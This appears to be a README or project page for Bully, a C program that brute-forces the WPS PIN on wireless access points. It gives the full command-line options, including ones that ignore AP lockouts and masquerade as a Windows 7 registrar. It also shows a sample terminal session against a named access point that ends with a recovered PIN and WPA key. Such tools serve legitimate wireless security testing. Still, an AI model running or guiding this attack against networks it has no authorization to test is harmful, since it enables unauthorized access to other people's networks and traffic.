Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
bully <options> interface
Required arguments: interface : Wireless interface in monitor mode (root required) -b, --bssid macaddr : MAC address of the target access point Or -e, --essid string : Extended SSID for the access point Optional arguments: -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g] -l, --lockwait N : Seconds to wait if the AP locks WPS  -p, --pin N : Index of pin to start at (7 digits) [Auto] -s, --source macaddr : Source (hardware) MAC address [Probe] -v, --verbosity N : Verbosity level 1-3, 1 is quietest  -w, --workdir : Location of pin/session files [~/.bully/] -5, --5ghz : Hop on 5GHz a/n default channel list [No] -F, --fixed : Fixed channel operation (do not hop) [No] -S, --sequential : Sequential pins (do not randomize) [No] -T, --test : Test mode (do not inject any packets) [No] Advanced arguments: -a, --acktime N : Acknowledgement and pcap timeout (ms)  -r, --retries N : Resend packets N times when not acked  -m, --m13time N : M1/M3/Initial beacon timeout (ms)  -t, --timeout N : Timeout for Auth/Assoc/Id/M5/M7 (ms)  -1, --pin1delay M,N : Delay M seconds every Nth nack at M5 [0,1] -2, --pin2delay M,N : Delay M seconds every Nth nack at M7 [5,1] -A, --noacks : Disable ACK check for sent packets [No] -C, --nocheck : Skip CRC/FCS validation (performance) [No] -D, --detectlock : Detect WPS lockouts unreported by AP [No] -E, --eapfail : EAP Failure terminate every exchange [No] -L, --lockignore : Ignore WPS locks reported by the AP [No] -M, --m57nack : M5/M7 timeouts treated as WSC_NACK's [No] -N, --nofcs : Packets don't contain the FCS field [Auto] -P, --probe : Use probe request for nonbeaconing AP [No] -R, --radiotap : Assume radiotap headers are present [Auto] -W, --windows7 : Masquerade as a Windows 7 registrar [No] -h, --help : Display this help information
cyborg@cyborg:~$ sudo bully mon0 -b 10:FE:ED:B7:A5:42 -e tempztrela -c 1 [+] Switching interface 'mon0' to channel '1' [!] Using '00:c0:ca:75:9f:e2' for the source MAC address [+] Datalink type set to '127', radiotap headers present [+] Scanning for beacon from '10:fe:ed:b7:a5:42' on channel '1' [+] Got beacon for 'tempztrela' (10:fe:ed:b7:a5:42) [!] Creating new randomized pin file '/root/.bully/pins' [+] Index of starting pin number is '0000000' [+] Last State = 'NoAssoc' Next pin '80218142' [+] Rx( M5 ) = 'Pin1Bad' Next pin '92878143' [!] Received disassociation/deauthentication from the AP [+] Tx(DeAuth) = 'NoAssoc' Next pin '92878143' [!] Unexpected packet received when waiting for WPS Message [!] >00001a002f48000003ddde0a0000000010026c09c000db0100000802ca0000c0ca759fe210feedb7a54210feedb7a5421000aaaa0300000086dd6000000000183afffe800000000000000000000000000001ff020000000000000000000000000001860096774098001e0000000000000000010110feedb7a542846325bf< [+] Rx( M1 ) = 'WPSFail' Next pin '92878143' [+] Rx( M5 ) = 'Pin1Bad' Next pin '28738145' [+] Rx( M5 ) = 'Pin1Bad' Next pin '63058147' [!] Received disassociation/deauthentication from the AP [+] Rx( Auth ) = 'NoAssoc' Next pin '63058147' [!] Unexpected packet received when waiting for WPS Message [!] >00001a002f480000c467220b0000000010026c09c000c60100000802ca0000c0ca759fe210feedb7a54210feedb7a5422000aaaa0300000086dd6000000000183afffe800000000000000000000000000001ff020000000000000000000000000001860096774098001e0000000000000000010110feedb7a5420d0dce95< [+] Rx( M1 ) = 'WPSFail' Next pin '63058147' [!] Unexpected packet received when waiting for WPS Message [!] >00001a002f480000ae7d300b0000000010026c09c000df0100000802ca0000c0ca759fe210feedb7a54274de2bc3a02f2000aaaa0300000086dd6000000000203afffe80000000000000cca5e8db60581843ff0200000000000000000001ff00000187000dad00000000fe800000000000000000000000000001010174de2bc3a02fa73734cb< [+] Rx(M2D/M3) = 'WPSFail' Next pin '63058147' [+] Rx(M2D/M3) = 'Timeout' Next pin '63058147' Saved session to '/root/.bully/10:fe:ed:b7:a5:42.run' PIN: '254784781' KEY: '123456789'